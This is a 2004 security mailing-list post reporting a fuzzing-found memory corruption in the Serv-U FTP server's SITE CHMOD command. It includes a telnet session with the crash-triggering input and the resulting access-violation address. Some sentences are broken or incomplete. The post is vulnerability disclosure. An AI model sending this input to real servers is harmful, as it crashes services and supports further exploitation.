Serv-U 4.1 Memory Corruption / Whatever
From: Der Ago (maillist_at_bastart.eu.org)
Date: Mon, 16 Feb 2004 22:10:57 +0100 To: firstname.lastname@example.org
Well, I didn't have the time to fully analyze it yet, but by using a
fuzzer to check
Serv-U, I found something that crashed it using bad data in SITE CHMOD.
not the already discovered vulnerability, cause it can be used without
the crash occurs before permissions are even checked. Seems like an
cause you can control 2 bytes of a dword where your buffer gets written,
but I wasn't
able to find how the other 2 bytes are controlled yet, and I wasn't able
to do anything
useful with the 2 bytes I have cause they can't be NULL. Well, I hope
enlighten me a little, cause I tried the last 2 days and now I'm out of
hello@proxy:~# telnet ftp.target.com 21
Connected to 127.0.0.1.
Escape character is '^]'.
220 Serv-U FTP Server v4.0 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Connection closed by foreign host.
this will cause this an ccess violation writing to 0x555551AD (UUQ-)